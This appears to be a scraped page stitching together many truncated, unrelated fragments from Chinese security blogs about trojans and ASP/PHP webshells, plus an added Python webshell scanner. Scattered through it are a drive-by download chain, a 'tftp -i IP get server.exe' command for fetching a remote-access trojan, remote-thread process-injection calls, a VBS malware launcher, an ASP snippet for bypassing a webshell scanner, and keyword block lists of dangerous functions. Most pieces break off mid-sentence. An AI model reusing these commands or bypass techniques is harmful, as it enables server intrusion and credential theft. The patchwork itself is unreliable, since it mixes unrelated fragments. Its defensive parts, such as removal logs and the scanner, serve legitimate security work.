An official website serving a trojan: Trojan-PSW.Win32.OnLineGames.sbg
Endurer original, 2008-02-29, 1st version
1. The website homepage contains the code: /------/
1.1 hxxp://pop**.I**Ms**E*.CC/g3.htm contains the code: /------/
1.1.1 hxxp://pop**.I**Ms**E*.CC/news.html outputs the code: /------/
1.1.1.1 hxxp://X**x*X.c**Ka**BC*.Net/ms06014.js
which downloads hxxp://user**1*.1**A2B**3C*0.net/bak.css
A trojan that took me a whole day to remove; it was really hard to find.
1. We found that the file c:\windows\system32\30pzg8d.dll was infected with Trojan.DL.win32.hmir.HL but it could not be deleted, so we had to force-delete it with IceSword.
3. After the deletion and a restart, rundll prompted that the module 30pzg8d.dll could not be found, indicating that there are services or startup items that
Trojan.psw.win32.qqpass, Trojan.psw.win32.gameol, etc. (1)
Endurer original, 2008-06-13, 1st version
A friend said that the real-time monitoring icons of the Rising antivirus and firewall on his computer had recently disappeared and that the computer had become very slow, and asked me to help repair it.
Downloaded pe_xscan to scan, and analyzed the log. The following suspicious it
A great many webmasters run IIS servers, especially for ASP sites, so guarding against ASP trojans has become the most critical part of site security.
In general, an ASP trojan today operates on the server through the following four points, so as long as we lock all of them down we can
Access via HTTP protocol
Using the one-line trojan (I only list two kinds):
1. When only database backup is available
When the database is backed up as an ASP file, no "compile error: missing script close tag %>" appears.
2) With SA privileges, usually first write a one-line trojan, for convenience. (Of course, uploading a Gray Pigeon directly via tftp and running it is quicker.)
tftp -i IP get server.exe
One-line trojan
First of all, know
The E
PHP web trojan scanner code sharing, PHP web trojan scanner
No nonsense; the code is pasted directly.
The code is as follows:
The code above is the shared PHP web trojan scanner code. The article carries comments; if you do not understand something, please leave me a message. I believe there is more than one way to implement this, and you are welcome to sha
Virus Trojan scan and removal: writing a dedicated kill tool for the QQ password-stealing trojan. I. Preface. Since I already wrote a general kill-tool framework in article 004, "Virus Trojan scan: writing a Panda Burning Incense kill tool", and that framework applies to this virus after simple modification, this article will not discuss the overlapping kno
Virus Trojan scan: reverse analysis of the QQ password-stealing trojan. I. Preface. In this series, unless there are special circumstances, I will use reverse analysis in the last part of each virus analysis to analyze the target virus thoroughly for readers. However, I spent three articles (about 2,500 words each) on the previous "Panda Burning Incense" virus and analyzed only 1/3 of it, the core part of
thread code is placed in it:
VirtualAllocEx(RpHandle, NULL, cb, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Write the remote thread's code into the remote process's address space:
WriteProcessMemory(RpHandle, RemoteThr, (LPVOID)Remote, cb, NULL);
The parameters the remote thread needs are also written into the remote process's address space:
WriteProcessMemory(RpHandle, RemotePar, (LPVOID)rp, cb, NULL);
Create the remote monitoring thread:
CreateRemoteThread(RpHandle, NULL, 0, (LPTHREAD_START_ROUT
Encountering qfgsw.sys / Trojan-Downloader.Win32.Agent.bbb / Trojan.win32.agent.BVl, etc.
Endurer original, December, 1st version
Last night a netizen said that the NOD32 on his computer had recently been reporting:
/---
Time      Module  Object  Name                                      Virus                                Operation                                            User  Information
21:30:22  AMON    file    C:/Windows/system32/Drivers/qfgsw.sys     Win32/TrojanDownloader.Agent.bbb     trojan has been deleted (the next time it is re-enabled
Trojan horse program TROJAN-SPY.WIN32.AGENT.CFU
The sample is a Delphi program packed with the MEW 1.x packer in an attempt to evade signature scanning; it is 67,908 bytes long, uses the default Windows icon and the EXE extension, and spreads mainly through web page drive-by downloads ("hanging horse"), file bundling and hacker attacks.
Virus analysis
Once activated, the sample drops the file Systen.dll into %Sy
First determine the file size:
If File.FileSize   ' the size threshold and the rest of this check are cut off in the original
After the file has been uploaded to the server, check the user's file for dangerous action strings:
Set MyFile = Server.CreateObject("Scripting.FileSystemObject")
Set MyText = MyFile.OpenTextFile(FilePath, 1)   ' open the uploaded text file for reading
sTextAll = LCase(MyText.ReadAll)                ' lowercase the whole content so the match is case-insensitive
MyText.Close
Set MyFile = Nothing
' "|"-separated keyword list; every entry must be lowercase to match sTextAll (the original ".SaveAs" could never match)
sStr = ".getfolder|.createfolder|.deletefolder|.createdirectory|.deletedirectory|.saveas|wscript.shell|script.encode|server.|."   ' the list continues in the original but is cut off here
Win32.loader.C, Trojan.psw.win32.gameonline, Trojan.psw.win32.asktao, etc. (2)
Endurer original, 1st version
Checking the EXE files on drives other than C:, their last-modified times are all similar and their sizes have grown; for example the English version of HijackThis 1.99.1 is normally 218,112 bytes, and a 223,585-byte copy should be taken as infected. No wonder the firewall prompts that the program acc
Scanned the machine today and found a trojan:
File: C:\Program Files\nuneos\mumnos\socesv.dll
File: C:\Program Files\nuneos\mumnos\sosvus.dll
File: C:\Program Files\nuneos\micesv.exe
Microsoft's MSE scan report:
Category: Trojan
Description: This program is dangerous and executes commands from an attacker.
Recommendation: Remove this software immediately.
Microsoft Security Essenti
Latest virus combination Auto.exe: manual removal of the game-account-stealing trojan downloader
The following is the virus's launcher code, Microsofts.vbs:
The code is as follows:
Set lovecuteqq = CreateObject("Wscript.Shell")   ' Windows Script Host shell object
lovecuteqq.Run ("C:\docume~1\admini~1\locals~1\temp\microsofts.pif")   ' launch the dropped .pif from the user's temp directory
Trojan name: TROJAN-PSW/WIN32.ONLINEGAMES.LXT
Path: C:\WINDOWS\sys
Hanxiaolian
Written to bypass lake2's ASP Webmaster Admin Assistant.
A. Bypassing the lake2 ASP trojan scanner with a small trojan ("pony")
The code is as follows:
Set c = CreateObject("ADOX.Catalog")
' create an empty Access (Jet) database whose file name ends in .asp
c.Create "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath("a.asp")
Set c = Nothing
ConnStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath("a.asp")
Set Conn = Server.CreateObject("ADODB.Connection")
Conn.Open ConnStr
Conn.Execute "CREATE TABLE Nomm (Nomuma OLEObject)"   ' an OLE Object column to hold the payload bytes
Set Rs   ' the rest of the snippet is cut off in the original
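The ASP keyword check, the PHP web trojan scanner and the database-backup bypass above all come down to the same defensive question: does a file under the web root contain webshell code, whatever its extension and whatever bytes surround it? The following is an added example, not code from this page, from lake2's tool or from any scanner named here. It is a small Python scanner that reads each file as raw bytes (so a one-liner buried inside a binary .mdb saved as a.asp is still seen), lowercases them the way the ASP snippet does, and reports which dangerous tokens occur. The token lists, the one-liner pattern (the classic <%eval request("x")%> form is assumed, since the page names it without showing it), the sample file names and their contents are all constructed for this example.

```python
"""Added example: a byte-level webshell scanner for ASP and PHP files.

Not the page's own code. Token lists, the one-liner regex and all sample
files below are constructed for the example.
"""
import os
import re
import tempfile

# Tokens taken from the ASP check on the page plus common PHP ones, all
# lowercase because the haystack is lowercased (".SaveAs" would never match).
ASP_TOKENS = [b".getfolder", b".createfolder", b".deletefolder", b".createdirectory",
              b".deletedirectory", b".saveas", b"wscript.shell", b"script.encode",
              b"shell.application", b"adodb.stream", b"eval request", b"execute request"]
PHP_TOKENS = [b"eval(", b"assert(", b"system(", b"shell_exec(", b"passthru(",
              b"base64_decode(", b"preg_replace(", b"$_request", b"$_post"]
# Assumed one-liner shape: <% eval|execute ( request( ... ; whitespace-insensitive.
ONE_LINER = re.compile(rb"<%\s*(?:eval|execute)\s*\(?\s*request\s*\(", re.IGNORECASE)

MAX_SIZE = 2 * 1024 * 1024  # skip very large files, like the FileSize check on the page


def scan_bytes(data: bytes, ext: str) -> list:
    """Return the list of findings (token strings) for one file's raw content."""
    hay = data.lower()
    tokens = PHP_TOKENS if ext in (".php", ".phtml") else ASP_TOKENS
    findings = [tok.decode() for tok in tokens if tok in hay]
    if ONE_LINER.search(data):
        findings.append("asp-one-liner")
    return findings


def scan_dir(root: str) -> dict:
    """Walk root and return {relative path (with '/'): findings} for flagged files."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if os.path.getsize(path) > MAX_SIZE:
                continue
            with open(path, "rb") as f:
                data = f.read()
            findings = scan_bytes(data, os.path.splitext(name)[1].lower())
            if findings:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = findings
    return hits


def build_samples() -> str:
    """Write constructed sample files into a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="webshell_demo_")
    samples = {
        "index.asp": b"<% Response.Write(\"hello\") %>",                      # benign
        "upload/x.asp": b"<%Set o=Server.CreateObject(\"Scripting.FileSystemObject\")"
                        b":o.CreateFolder(\"c:\\t\")%>",                     # FSO abuse
        # binary-looking "database backup" saved as .asp with the one-liner inside
        "db/a.asp": b"\x00\x01Standard Jet DB\x00" + bytes(range(256))
                    + b"<%eval request(\"cmd\")%>" + b"\xff" * 32,
        "shell.php": b"<?php @eval($_POST['pass']); ?>",                     # PHP one-liner
        "clean.php": b"<?php echo htmlspecialchars($_GET['q'] ?? ''); ?>",  # benign
    }
    for rel, content in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(content)
    return root


if __name__ == "__main__":
    for path, found in sorted(scan_dir(build_samples()).items()):
        print(f"{path}: {', '.join(found)}")
```

Scanning bytes rather than decoded text is the point: the a.asp "backup" is mostly binary, and a scanner that opens it as text and stops at the first odd byte, or that only looks at files with script extensions and well-formed content, misses the one-liner that IIS will happily execute. Keyword matching is still only a first filter; a packed or string-concatenated payload needs a different check.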
There are two sides to everything. This article introduces web trojan production techniques in order to strengthen awareness of prevention, not to encourage misuse. I hope it can help a little toward creating a safe Internet environment.
If you visit the XX website (a domestic portal), you will be infected with the Gray Pigeon trojan. That is what a hacker friend of mine told me. Open the homepage of the